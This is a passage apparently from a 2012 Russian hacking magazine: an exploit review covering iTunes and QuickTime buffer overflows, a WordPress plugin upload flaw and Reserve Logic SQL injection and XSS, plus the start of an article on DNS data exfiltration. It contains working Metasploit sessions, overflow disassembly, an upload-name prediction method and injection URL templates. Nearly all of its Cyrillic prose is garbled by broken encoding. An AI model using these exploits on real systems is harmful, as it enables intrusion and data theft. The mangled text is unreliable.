) '(##&* +,-.(/ 0/.1 2&3'/4 &5 &6!57/ 2/0/2&,#/#!$ 5-8/0( #( +4/7/ 9 9/0+!$: iTunes, #(.!#($ + 10.4.0.80 ! ;(7(#.!9($ 10.6.1.7. <&%'( &470=-9(/4+$ 0(+6!0/##=3 m3u-8(3,, +&'/0>(?!3 4/% «#EXTINF:», iTunes 7&2!0-/4 '(##=/, 0(+2&,(%("?!/+$ 2&+,/ '(##&%& 4/%(, 5/; 7(7!:-,!5& 20&9/0&7. <&2!0&9(#!/ 20&!+:&'!4 !; 5-8/0( 9 7-./ 9 5-8/0 #( +4/7/, 20! @4&* &+-?/+49,$/4+$ ;(2!+1 '(##=: ;( %0(#!A= 5-8/0( #( +4/7/, .4& 20!9&'!4 7 9&;*&>#&+4! 9=2&,#/#!$ 20&!;9&,1#&%& 7&'( 9 7&#4/7-+4/ 2&,1;&9(4/,$, ;(2-+4!96/%& 20&A/++ iTunes’(.

EXPLOIT B(.#/* #(6! !;=+7(#!$ + ;(2-+7( *&'-,$ ',$ Metasploit, +&&49/4+49-"-?/%& 0(++*(40!9(/*&3 -$;9!*&+4!:

msf > use exploit/windows/browser/apple_itunes_extended_m3umsf exploit(apple_itunes_extended_m3u) > set uripath exmuripath => exmmsf exploit(apple_itunes_extended_m3u) > set target 0target => 0msf exploit(apple_itunes_extended_m3u) > set payload windows/execpayload => windows/execmsf exploit(apple_itunes_extended_m3u) > set cmd calc.exe

cmd => calc.exemsf exploit(apple_itunes_extended_m3u) > show optionsModule options (exploit/windows/browser/apple_itunes_extended_m3u):Name Current Set Required Description---- ----------- -------- -----------SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0SRVPORT 8080 yes The local port to listen on.SSL false no Negotiate SSL for incoming connectionsSSLCert no Path to a custom SSL certifi cate (default is randomly generated)SSLVer SSL3 no Specify the version of SSLthat should be used (accepted: SSL2, SSL3, TLS1)URIPATH exm no The URI to use for this exploit (default is random)

Payload options (windows/exec):Name Current Set Required Description---- ----------- -------- -----------CMD calc.exe yes The command string to executeEXITFUNC process yes Exit technique: seh, thread, process, none

Exploit target: Id Name 0 iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3

C +#&9( *= 8(;;/0 ;(2-+4!*,C +#&9( &# 9='(+4 #(* +5&3.D">/4 ,!7&9(#1$ &2-+4!*,E7+2,&!4&*/37/0=, 9 5&3!

0-./0 12345/67/8

!"!#$% &'()("*+$, -.%'$/0&1(2

,"*%& )&%-."/0$+*'1 (ivinside.blogspot.com)!2'#$'3 4'5"3&+*'1 (115612, '/0. <0(+#($ ;9/;'&.7(, '. 1)

WARNING

6.7 '/8+$2"9'7 :$%0+.#"*&%/" '.-&;1'#%&</+ * +(/"-+2'#%&</=5 9%&75. >' $%0"-9'7, /' "*#+$ /% /%.?# +#*%#.#*%//+.#' (" &;@+3 *+(2+A/=3 *$%0, :$'1'/%//=3 2"#%$'"&"2' 0"//+3 .#"#<'.

!"#$% &'()*$+,$-

063!"#$% 09 /164/ 2012

msf exploit(apple_itunes_extended_m3u) > exploit[*] Exploit running as background job.[*] Using URL: http://0.0.0.0:8080/exm[*] Local IP: http://192.168.0.64:8080/exm[*] Server started.msf exploit(apple_itunes_extended_m3u) >

.,/', (0%-0% #/)1203. .405 3/ 5/6+31, 3/ '$,$%$7 1 3/( 1(,/3$-*03 iTunes. 8/)1('/05 ,/5 Internet Explorer, iTunes; /,,/9+5(: ' iTunes $,-*/49+'$5, -"+-/05 - /4%0(3$7 (,%$'0 IE ;%/#1 http://192.168.0.64:8080/exm + )/%1 (0'134 <405 %0#1*=,/,/.

>0#1*=,/, :-*:0,(: ' 3/5 - $"*+'0 ACCESS VIOLATION )%+ )$)?,'0 #/-)+(+ )$ /4%0(1 0x130000 )$(*0 +()$*303+: (*041@207 +3(,%1'A++:

10CE9A7A EP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]

B0%07405 3/ 3/9/*$ ;13'A++, ' '$,$%$7 $,3$(+,(: 4/33/: +3(,%1'-A+:, + )$)?,/05(: )$3:,=, 9,$ #/ #-0%= )%04(,/* 3/6051 -#$%1. IDA, ' ($</*03+@, $)$#3/,= 0C$ 30 (5$C*/, 31 + */43$ — )$"1405 (0C$43: (+C3/,1%3?5+ 3+20"%$4/5+. B1,05 "0(D+,%$(,3?D 15$#/'*@903+7 )%+D$4+5 ' -?-$41, 9,$ )0%04 3/5+ '%/(10,(: strncpy(char *destination, const char *source, size_t num). E?#?-/0,(: $3/ $,(@4/:

10356949 PUSH ESI1035694A ADD EAX,81035694D PUSH EBP1035694E PUSH EAX1035694F CALL strncpy ; <--- GSOM!10356954 MOV EAX,DWORD PTR SS:[ESP+4C]10356958 MOV ECX,DWORD PTR SS:[ESP+24]1035695C ADD ESP,0C

F/ (,0' )%+ &,$5 '*/41,(: (*041@2+0 /%C1503,?:

0012EE6C 0012F620 ; ȔȘȤșȥ ȡȔ ȥȦșȞș, ȞȧȘȔ Ƞȯ ȕȧȘșȠ ȣȜȥȔȦȰ0012EE70 05A1C429 ; ȔȘȤșȥ Ȗ Ȟȧȫș, ȢȦȞȧȘȔ Ƞȯ ȕȧȘșȠ ȫȜȦȔȦȰ0012EE74 00000FF7 ; ȤȔțȠșȤ ȞȢȣȜȤȧșȠȯȩ ȘȔȡȡȯȩ

!,-0,(,-033?5 #/ "0(;$%5033$0 "0#$"%/#+0, (-:#/33$0 ( )0%0-)$*303+05 "1;0%/, "140, ,%0,+7 /%C1503,, )%04(,/-*:@2+7 ($"$7 %/#50% '$)+%105?D 4/33?D + - 3/605 (*19/0 %/-3?7 0xff7.

E 40*=,/-$'%0(,3$(,+ &,$C$ -?#$-/, ' ($</*03+@, 30 "?*$ '$4/ 4*: )%$-0%'+ 1)$5:31,$C$ ,%0,=0C$ /%C1503,/, + -'1)0 ( ,05 ;/',$5, 9,$ ;13'A+: strncpy :-*:0,(: 30"0#$)/(3$7, +()$*303+0 ;13'A++ ( )$4$"3?5+ /%C1503,/5+ )%+-$4+, ' (,$*= )09/*=3?5 )$(*04(,-+:5…

!90-+43$, 9,$ (,0' )$(*0 "1;0%/, '14/ )%$+(D$4+*/ #/)+(=, )%0-%/-,+*(: - 50(+-$. F$ 9,$ 30 5$<0, 30 %/4$-/,= — 50(+-$, 3/5 )$4-*/(,3$0.

E )%$A0((0 )0%0#/)+(+ 5? -?6*+ #/ C%/3+A? "1;0%/ 3/ (,0'0 + )0%0#/)+(/*+ (-$+5+ 4/33?5+ /4%0( -$#-%/,/, ,/'<0 %/()$*/C/@-2+7(: 3/ (,0'0. E )%+3A+)0, 3/ &,$5 5$<3$ "?*$ "? $(,/3$-+,=(: + )$-*19+,= '*/((+90('+7 ,+) &'()*$7,/. F$ - 4/33$5 (*19/0 /-,$%? )$6*+ 4/*=60 + )0%0#/)+(/*+ ,/'<0 SEH-A0)$9'1, )%0-%/,+- ,05 (/5?5 $"?93?7 '*/((+90('+7 &'()*$7, - SEH-&'()*$7,. F1 / 4*: ,$C$, 9,$"? )0%04/,= 1)%/-*03+0 3/ )0%0#/)+(/33?7 /4%0( SEH-$"%/"$,9+'/, $3+ )%$4$*<+*+ C/4+,= - (,0', )$'/ 30 1)0%*+(= - 1)$5+3/05?7 -?60 ACCESS VIOLATION )%+ )$)?,'0 #/)+(+ )$ /4%0(1 0x130000. G)%/-*0-3+0 - (-:#+ ( &,+5 )0%04/*$(= 3/ '$3,%$*+%105?7 SEH-$"%/"$,9+', 4/*00 3/ ROP-A0)$9'1, #/4/907 '$,$%$7 :-*:0,(: -?#$- ;13'A++ VirtualProtect 4*: 1(,/3$-'+ )%/- 4$(,1)/ 3/ +()$*303+0 (,%/3+A/5 )/5:,+, ($40%</2+5 60**-'$4 (4/"? $"$7,+ DEP). . )$(*043+7 6/C — ($"(,-033$ )0%04/9/ 1)%/-*03+: 3/ 60**-'$4. 8/3/-0(.

TARGETS iTunes 10.4.0.80—10.6.1.7.

SOLUTION H120(,-10, $"3$-*03+0, 1(,%/3:@200 4/331@ 1:#-+5$(,=.

2 & Apple QuickTime '()('*+,(,-( ./0()1 ,1 23(4( ')- *.)1.*34( TeXML-015+1

CVSSV2 9.3

(AV:N/AC:M/AU:N/C:C/I:C/A:C) BRIEF I/,/ %0*+#/: 28 +@3: 2012 C$4/J-,$%: Alexander Gavrun, sinn3r, juan vazquezCVE: CVE-2012-0663

B%+ $"%/"$,'0 ()0A+/*=3?5 $"%/#$5 (;$%5+%$-/33$C$ TeXML-;/7*/ )%$+(D$4+, )0%0)$*303+0 "1;0%/ 3/ (,0'0, 9,$ )%+-$4+, ' -$#5$<3$(,+ -?)$*303+: )%$+#-$*=3$C$ '$4/ - '$3,0'(,0 )$*=#$-/,0*:, #/)1(,+--60C$ )%$A0(( QuickTime.

EXPLOIT E 4/33$5 5$41*0 &'()*1/,+%10,(: $6+"'/ - '$5)$303,0 QuickTime3GPP.qtx - )%$A0((0 $"%/"$,'+ /,%+"1,/ 'color'. !6+"'/ )%$:-*:0,(: +#-#/ 30'$%%0',3$7 )%$-0%'+ %/#50%/ 4/33?D )0%04 +D '$)+%$-/3+05 - "1;0% ;+'(+%$-/33$C$ %/#50%/, %/()$*/C/@2+7(: 3/ (,0'0. F+<0 )%04(,/-*03 A+'*, - '$,$%$5 + )%$+(D$4+, #/,+%/3+0 -(0C$ <+-$C$ 3/ (,0'0:

.text:67E6D0E0 loc_67E6D0E0: ; CODE XREF: vulnfoo+1F|j

.text:67E6D0E0 add ecx, 1

.text:67E6D0E3 mov [esi], al ; <- ȣȔȘȔșȠ ȥ ACCESS VIOLATION ; Ȗ ȣȤȢȪșȥȥș țȔȣȜȥȜ ȣȢ ; ȔȘȤșȥȧ 0x140000.text:67E6D0E5 mov al, [ecx].text:67E6D0E7 add esi, 1.text:67E6D0EA add dl, 1.text:67E6D0ED cmp al, bl.text:67E6D0EF jnz short loc_67E6D0E0

K/' + - )%04?41205 (*19/0, 5? +5005 40*$ ( SEH-&'()*$7,$5, )$&,$51 /4%0( SEH-$"%/"$,9+'/ )0%0#/)+(/3 3/6+5 #3/903+05:

SEH chain of main threadAddress SE handler0013CE78 QuickT_2.66801042601E06EB *** CORRUPT ENTRY ***

L$ 0(,= )$(*0 ,$C$, '/' - %0#1*=,/,0 +()$*303+: +3(,%1'A++ «mov [esi], al» "140, (C030%+%$-/3$ +('*@903+0 ACCESS_VIOLATION, 1)%/-*03+0 )0%0740, 3/ (*041@2+7 '$4:

66801042 5F POP EDI66801043 5E POP ESI66801044 C3 RETN

K*/((+'/ </3%/. I/*00 1)%/-*03+0 )0%04/0,(: 3/ 60**-'$4 + #/-)1('/0,(: '/*='1*:,$%. E 4/33$5 Metasploit-5$41*0 $,(1,(,-10, $"D$4 DEP’/, 3$ 3+',$ ,0"0 30 #/)%02/0, 0C$ #40(= 4$"/-+,=.

M030%/A+: &'()*$7,/ 4*: QuickTime 7.6.9 ( )$*0#3$7 3/C%1#'$7 - -+40 #/)1('/ '/*='1*:,$%/:

msf > use exploit/windows/fi leformat/apple_quicktime_texmlmsf exploit(apple_quicktime_texml) > info...Available targets: Id Name -- ---- 0 QuickTime 7.7.1 on Windows XP SP3 1 QuickTime 7.7.0 on Windows XP SP3...

!"#$% &'()*$7,$-

064 !"#$% 09 /164/ 2012

&'()* / !"#!$ %&'()!*+!,

msf exploit(apple_quicktime_texml) > set target 2target => 2msf exploit(apple_quicktime_texml) > set payload windows/execpayload => windows/execmsf exploit(apple_quicktime_texml) > set cmd calc.execmd => calc.exemsf exploit(apple_quicktime_texml) > exploit[*] Creating 'msf.xml'.[+] msf.xml stored at /home/pikofarad/.msf4/local/msf.xmlmsf exploit(apple_quicktime_texml) >

TARGETS QuickTime 7.6.9, QuickTime 7.7.0, QuickTime 7.7.1.

SOLUTION !"#$%&'"$& ()*('+$*,$, "%&-.*/0#$$ 1.**"0 "/2',3(%&4.

3 '+,-./0+ 1-23/425672,2 8+95+ 4 WordPress Resume Submissions & Job Postings

CVSSV2 5.0

(AV:N/AC:L/AU:N/C:N/I:P/A:N) BRIEF 5$'/&(6( ,0+/ )7+, (8")+,9('.*7 1$&.+, "/2',3(%&, ' 8+.6,*$ WordPress Resume Submissions & Job Postings, 8(2'(+/0#$: 2.6-";.&4 8-(,2'(+4*7$ <.:+7 *. %$-'$- (%.3( %()(:, 1+/ ,= 8(%+$1"0#$6( ,%-8(+*$*,/).

EXPLOIT > 8+.6,*$ %"#$%&'"$& '(23(;*(%&4 2.6-"29, -$203$ ?$-$2 8(+$ «file attachment», ' 9(&(-(3 *,9.9 *$ <,+4&-"$&%/ -.%@,-$*,$ <.:+.. >+(;$*,/ 2.6-";.0&%/ ' 8.89" /wp-content/uploads/rsjp/attachments/. A1*.9( ,3/ <.:+. 8-, 2.6-"29$ ,23$*/$&%/, 2. B&( (&'$?.0& %&-(9, 193–197 ' %9-,8&$ /wp-content/plugins/resume-submissions-job-postings/includes/functions.php:

foreach( $_FILES[$input]['error'] as $key => $error ){ if ( $error == UPLOAD_ERR_OK ) { $tmpName = $_FILES[$input]['tmp_name'][$key]; $ext = getExtension( $_FILES[$input]['name'][$key]); $name = md5( date( 'Y-m-d H:i:s' ) ) . '-' . $count . '.' . $ext;

C2 B&(6( <-.63$*&. 9(1. %+$1"$&, ?&( ' 9.?$%&'$ *('(6( ,3$*, <.:+. ,%-

8(+42"$&%/ MD5 (& 2*.?$*,/ &$9"#$: 1.&7 *. %$-'$-$, ' 1('$%(9 9 B&(3" 8-,).'+/$&%/ 1$<,% , 8(-/19('7: *(3$- <.:+. ($%+, 2.6-";.+%/ (1,* <.:+, &( &.3 '%$61. )"1$& %&(/&4 $1,*,D.).

E.%%3(&-,3 9(*9-$&*7: 8-,3$-. F%+, '-$3/ *. %$-'$-$ )7+( -.'*( 2012-07-09 21:22:20 , ' B&" %$9"*1" )7+ 2.6-";$* -('*( (1,* <.:+, &( $6( ,3/ )"1$& 813a2040e8ef7fe3661972696409b562-1.php , $6( 3(;*( )"1$& ()*.-";,&4 ' 8.89$ /wp-content/uploads/rsjp/attachments/. 5+/ 8(-+"?$*,/ 1.&7 %$-'$-. 3(;*( '(%8(+42('.&4%/ Burp Suite , 8(%3(&-$&4 1.&" %$-'$-., 9(&(-./ "9.2.*. ' 200-3 (&'$&$ %$-'$-. 8(%+$ (&8-.'9, <.:+.. 5+/ <(-3,-('.*,/ 8-.',+4*(6( ,3$*, <.:+. &.9;$ *$()=(1,3( 8-,).',&4 (1*" %$9"*1" 9 '-$3$*, %$-'$-., 8(+"?$**(6( ' (&'$&$. G.9,3 ()-.2(3, $%+, '-$3/ %$-'$-. )7+( 2012-07-09 21:22:19, &( ,3/ 2.6-";$*-*(6( <.:+. )"1$& md5("2012-07-09 21:22:20") + '-1.php'.

TARGETS WordPress Resume Submissions & Job Postings v2.5.1 ,, '(23(;*(, )(+$$ -.**,$.

SOLUTION A)*(',&4 WordPress Resume Submissions & Job Postings 1( '$-%,, 2.5.2 ,+, )(+$$ 8(21*$:.

4 *72:;<=4;77>; .?/43@2<=3 4 Reserve Logic v1.2 Booking CMS

CVSSV2 8.5

(AV:N/AC:M/Au:S/C:C/I:C/A:C) BRIEF > %$-$1,*$ ,0*/ )7+, -.%9-7&7 "/2',3(%&, ' 1',;9$ Reserve Logic v1.2 Booking, ' ?,%+$ 9(&(-7= %&.*1.-&*7$ , %+$87$ SQL-,*H$9D,,, 2.6-"29. 8-(,2'(+4*7= <.:+(', . &.9;$ -.2*(@$-%&*7$ XSS. I. %&(+4 1$-29"0 -.21.?" '2/+. *. %$)/ (&'$&%&'$**(%&4 9(*&(-. Vulnerability-Lab.

EXPLOIT 1. SQL-!"#$%&!!. J&, "/2',3(%&, 8(2'(+/0& .&.9"0#$3" '78(+-

*,&4 8-(,2'(+4*7$ SQL-9(3.*17 *. %((&'$&%&'"0#$: !KL5.'()*!+,$ -%.!/0,:• packagedetails.php;• booking_report.php;• users_report.php;• editenquiries.php;• addclientlocations.php;• addcustomers.php;• addpackages.php;• addaccomtypeavailability.php;• booking_report.php;• addspecialoffer.php.

064

QuickTime — &!%1, %202.,3 /.!*$4$0 % /$.$/21"$"!5 678$.9 "9 -0$%$

iTunes 10 — 26:24 DEP * ROP-&$/2;%$

065

!"#$% &'()*$+,$-

!"#$% 09 /164/ 2012

!"#$%&'( )*+*&(,+':• id;• rghtMenu;• pid; • orderby.

./#-01$(,0 1$23, &'()*34,0%$-4,5(/ "6# 74*080/ 4''437,4 )%0--0*620%$-477$2$ )$*5#$-4,6*/. 9$, 76('$*5'$ )%016%$-:

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/packagedetails.php?pid=4+[SQL-INJECTION]AND+substring(version(),1)=5

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/booking_report.php?rghtMenu=rghtMenu3&[SQL-INJECTION]Union+select+1,2,3,4,5...30--%20-0&sort=x&txtFromDate=x&txtToDate=x

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/booking_report.php?rghtMenu=rghtMenu3&orderby=-1%27[SQL-INJECTION]&sort=ASC&txtFromDate=05-17-2012&txtToDate=06-16-2012

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/addaccomtypeavailability.php?id=72[BLIND SQL-INJECTION] • http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/booking_report.php?rghtMenu=rghtMenu3&[BLIND SQL-INJECTION]&sort=ASC&txtFromDate=x&txtToDate=x

2. -*.+/#0* )+1%#$1234'5 6*721$. ./#-01$(,5 )$#-$*/6, )%0--0*620%$-477$13 )$*5#$-4,6*: #42%3;4,5 -%6<$7$(7=6 >4+*= "6# '4'0?-*0"$ $2%4708670+. @0*5,%4A0/ #42%3;461=? >4+*$- $,(3,(,-36, ($-6%B677$, )$&,$13 4,4'3:C0+ 1$;6, "6# )%$-"*61 #42%3#0,5 -6"-B6**. ./#-01$(,5 %4()$*$;674 - ('%0),6 addlocationphotos.php. D42%3;461=6 >4+*= ($?%47/:,(/ - )4)'3 ../galleryimages/.

3. 80,%$4'( XSS. E,0 "420 )$#-$*/:, 4,4'3:C613 -76<%0,5 -%6<$-7$(7=+ ('%0), 74 (,%470A= )%0*$;670/. ./#-01$(,0 %4()$*$;6-7= - >4+*4? addpackages.php, add_news.php, add_banner.php 0*0 addaccomtypeavailability.php, 4 )$<-6%;677=6 01 )4%416,%= — &,$ title 0 name. F%6"36,(/ )$*5#$-4,6*5('0+ 4''437, "6# '4'0?-*0"$ ()6A04*57=? )%0-0*620+.

G*/ &'()*34,4A00 76$"?$<01$ #4+,0 74 $<73 0# (*6<3:C0? (,%470A:

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/addpackages.php

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/add_news.php

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/add_banner.php

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/addaccomtypeavailability.php

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/addcustomers.php

0 ('$)0%$-4,5 '$< (-$62$ 740)$*6#76+B62$ ('%0),4 - )$*/ --$<4 Title 0*0 Name.

4. 9*::%$4'( XSS. E,0 3/#-01$(,0 )$#-$*/:, 4,4'3:C613 )6%6-?-4,=-4,5 (6((00 <%320? )$*5#$-4,6*6+/1$<6%4,$%$-/4<1070-(,%4,$%$-.!"#$%&'( :0+%),':• locationdetails.php;• bookings.php;• addpackages.php;• add_news.php;• addaccomtypeavailability.php;• add_banner.php;• editfeedback.php.

H$<-6%;67= 3/#-01$(,/1 )4%416,%= nid, id, nBId, mbSearch, postsearch, txtkey, page 0 did. 9 %6#3*5,4,6 3()6B7$+ 4,4'0 1$;7$ #4-*4<6,5 4''437,$1, )%$-6(,0 >0B072-4,4'3 0*0 0#1670,5 ($-<6%;01$6 (,%470A= 74 (,$%$76 '*067,4. H%0 &,$1 73;7$ *:"=10, (41=10 0#$C%677=10 ()$($"410 #4(,4-0,5 )$*5#$-4,6*/ )6%6+,0 )$ ()6A04*57$ (>$%10%$-477$+ ((=*'6. H%016%= &'()*34,4A00:

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/locationdetails.php?did=[XSS]

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/bookings.php?page=[XSS]

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/addpackages.php?id=[XSS]

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/add_news.php?nid=[XSS]&page=1

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/addaccomtypeavailability.php?id=[XSS]&postsearch=S&cmbSearch=&page=1&txtkey=

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/add_banner.php?nBId=[XSS]&page=1

• http://127.0.0.1:1337/[ȣȧȦȰ-Ȟ-reservelogic]/admin/editfeedback.php?id=[XSS]&postsearch=S&cmbSearch=&page=1&txtkey=

TARGETS Reserve Logic v1.2 Booking CMS 0, -$#1$;7$, "$*66 %47706.

SOLUTION !"7$-0,5(/ <$ )$(*6<76+ -6%(00 . ziTunes 10 — $'#1$, )+%$1;"<%7 0 )(+()124(4%= >/6(+* 4* :,(0(

!"#$% !"#$%&'( )*'+,'# (twitter.com/stamparm)

&'()* 09 /164/ 2012066

SQL-!"#$%&!! — '(") !* +),-. /)+0/'+1/)"$""-. 23*4!,'+1$5 +'4/$,$""-. 4$6-0/!7'8$"!5. 9)*/)6'1:!%! 0'+1'3""' *)-%/-4);1 ,)++2 (-/'%, +43*)""-. + <1'5 0/'67$,'5, "' .)%$/- 0'-0/$8"$,2 ").'(31 +0'+'6- <%+072)1)&!! <1'5 +1)/'5 %)% ,!/ 23*4!,'+1!. =$>'("3 3 /)++%)82 1$6$ ' "$ "'4'5, "' ($5+14!1$7?-"' %/21'5 1$."!%$ !*47$:$"!3 ()""-. !* SQL-6)* + !+0'7?*'4)-"!$, DNS-*)0/'+'4, %'1'/)3 4 2,$7-. /2%). ,'8$1 +1)1? >/'*"-, '/28!$, 7;6'>' +'4/$,$""'>' 0$"1$+1$/). @'1'4? A'$.)7!!

SQL-!"#$%&!! '$($) DNS!"#$%&'( )"*'+,-("' .&/0 *&1102 %'+'/ DNS

BBCDCEFC A'( SQL-!"#$%&!$5 0'(/)*2,$4)$1+3 4"$(/$"!$ 0/'!*-4'7?"'>' SQL-%'() 4 *)0/'+ % =GHD (73 0'72:$"!3 ('+120) % ()""-, 1)67!&. E) 0/)%1!%$ <1' *):)+12; 4->73(!1 %)% +0$&!)7?"' +I'/,!/'4)""-5 *)0/'+ % +1/)"!&$ 4!() http://target.com/get_data.asp?id=1, >($ 4,$+1' 1 4 0)/),$1/$ id .)%$/ 0-1)$1+3 «0/'0!."21?» +$/!; !* SQL-%',)"(, %'1'-/)3 0'*4'73$1 0'72:!1? ('+120 % +'($/8!,',2 6)*- ()""-..

B *)4!+!,'+1! '1 7'>!%! /)6'1- 23*4!,'>' 0/!7'8$"!3, 1$."!%! <%+072)1)&!! SQL-!"#$%&!5 0/!"31' ($7!1? ") 1/! 6'7?J!$ >/200-: %7)++!:$+%!$, +7$0-$ ! )6+'7;1"' +7$0-$.

K("' !* '17!:!5 +7$0-. !"#$%&!5 '1 %7)++!:$+%!. +'-+1'!1 4 1',, :1' (73 <%+072)1)&!! '"! 1/$62;1 ':$"? ,"'>' 4/$,$"! ! 6'7?J'$ %'7!:$+14' *)0/'+'4, 4$(? ()""-$ «4-13>!4);1+3» 6!1 *) 6!1',. A'<1',2 )1)%2;L$,2 '6-:"' "$'6.'(!,' '10/)4!1? ($+31%! 1-+3: *)0/'+'4, :1'6- 4-13-"21? +'($/8!,'$ 1)67!:%! +/$("$>' /)*,$/), :1' ,'8$1 6-1? *),$:$"' 6(!1$7?"-, )(,!"!+1/)1'/', 23*4!,'5 +!+1$,-.

K(")%' $+1? +0'+'6-, 0'*4'73;L!$ *"):!1$7?"' 24$7!:!1? +%'/'+1? 0'72:$"!3 ()""-. !* =GDH 0/! <%+-072)1)&!! +7$0-. !"#$%&!5, 0/! <1', +"!*!4 %'7!:$+14' *)0/'+'4 % +),'5 6)*$. K6 '("', !* 1)%!. ,$1'('4 ,- +$>'("3 ! 0'>'4'/!,.

WARNING

-%. "/0$#+'1". ,#23$%*'(&2/' "%4&56"*2&7/$ ( $8/'4$+"*2&7/9: 12&.:. ;" #23'41"., /" '(*$# /2 /2%<* $*(2*%*(2//$%*" 8' &5=$> ($8+$?/9> (#23, ,#"6"/2//9> +'*2#"'&'+" 3'//$> %*'*7".

!"#$% 09 /164/ 2012 067

SQL-!"#$%&!! '$($) DNS

!"#"$%&% $%''() &"#"* DNS +#, SQL injection %-%.%)!#/0"11 #"*/23% $/4"''/5/ ,4"',

* +,- .,+/? 01233 242%, 4$5"!%2 6%3718242&!! %949(:5 79);91<$4 7918'!4= "2> !3%9>:? ;:!@(:A ;9 ;($>$"!, ; 2"@19<):'"9> !"4$("$4$ 9B:'"9 97!3:;2$43< %2% DNS Exfiltration. C)"2'21="9 79"<4!$ «exfiltration» B:19 ;9$"":> 4$(>!"9>, 79D %949(:> 79D(2)8>$-;2193= ;9);(2E$"!$ 2@$"42 (2);$D%! "2 (9D!"8. F G$4! 79D 64!> 319;9> ; %9"4$%34$ CH 9B:'"9 79"!>2$43< "$)2%9""9$ !);1$'$-"!$ D2"":5 !) !"I9(>2&!9"":5 3!34$>. J(! !3791=)9;2"!! 649? 4$5"!%! ; %9"4$%34$ SQL-!"#$%&!? 79<;1<$43< 37939B !);1$'$"!< D2"":5 '$($) DNS, 7(! %949(9> ;9)>9K"9 7($"$B($'= 9K!D2"!-$> 94;$42 94 3$(;$("9@9 7(!19K$"!< 7(! 6%3718242&!! 31$7:5 !"#$%&!? ! 7918'!4= ($)81=424: ;:791"$"!< 3;9!5 SQL-)27(939; ("27(!>$(, !>$"2 791=)9;24$1$? ! 72(91!), 947(2;1<< "2 3;9? DNS-3$(;$( DNS-)27(93:, 39D$(K2E!$ D2"":$ !) GLHM 8<);!>9@9 7(!19K$"!<. C3791=)9;2"!$ 649? 4$5"!%! D2$4 (<D "$9379(!>:5 7($!>8E$34; 79 3(2;"$"!N 3 time-based !1! true/false 4$5"!%2>!: ;9-7$(;:5, "2> "$ 4($B8$43< D9K!D24=3< 94;$42 94 ;$B-3$(;$(2, '49 38E$34;$""9 83%9(<$4 7(9&$33, ;9-;49(:5, )2 9D!" )27(93 >: >9K$> ;:42E!4= >"9@9 B91=A$ D2"":5. F-4($4=!5, 4$5"!%2 "$ "2-%12D:;2$4 9@(2"!'$"!? "2 "$342"D2(4":$ 4!7: D2"":5, 42B1!&: ! "2);2"!< 3491B&9;.

DNS-)27(93: >: B8D$> 7$($D2;24= 79 7(949%918 DNS, '49 "$8D!;!4$1="9 :). O49 94"93!4$1="9 7(9349? 7(949%91. P27(93, ;:791"<$>:? DNS-%1!$"49>, ! 3994;$434;8NE!? $>8 94;$4, 7($D9342;1<$>:? DNS-3$(;$(9>, !3791=)8N4 9D!" ! 494 K$ I9(>24 DNS-399BE$"!?. P2 !3%1N'$"!$> 4(2"3I$(9; )9", !3791=)8NE!5 D1< "2D$K"934! 7(949%91 TCP. DNS-399BE$"!< !"%27381!(9;2-": ; UDP-D242@(2>>: — >!"!>21=":$ $D!"!&: !"I9(>2&!! ; 7(949%91$ UDP D1< 9B>$"2 !"I9(>2&!$? (bit.ly/MtoIDx) "2 4(2"3-79(4"9> 8(9;"$ >9D$1! OSI (bit.ly/qqHbRE). M1< 1NB9@9 '$19;$%2, 938E$34;1<NE$@9 >9"!49(!"@ >2A!": 3 79>9E=N !"34(8>$"42, 79D9B"9@9 Wireshark, 3%(:4:? %2"21 7$($D2'! D2"":5, ;:791"$"-":? 79;$(5 DNS, B8D$4 ;:@1<D$4= %2% "$B91=A!$ 3$(!! ;371$3%2 DNS-4(2I!%2.

F 93"9;$ (2B94: 42%9@9 "$%9"4(91!(8$>9@9 %2"212 7$($D2'! D2"":5 1$K!4 7(9&$33 7$($D2'! DNS-)27(939; 94 B$)9723":5 3!34$> (19%21=":5 %9>7=N4$(9;) % 7(9!);91=":> DNS-3$(;$(2>, (237919K$"":> ; !"4$("$4$. M2K$ $31! 7($D7919K!4=, '49 ;:-59D ;9 ;"$A"NN 3$4= )27($E$", "9 &$1$;2< >2A!"2 37939B"2 ($)91;!4= 7(9!);91=":$ D9>$"":$ !>$"2, 49 7$($D2'2 D2"":5 ;9)>9K"2 3($D34;2>! 947(2;1<$>:5 DNS-)27(939;.

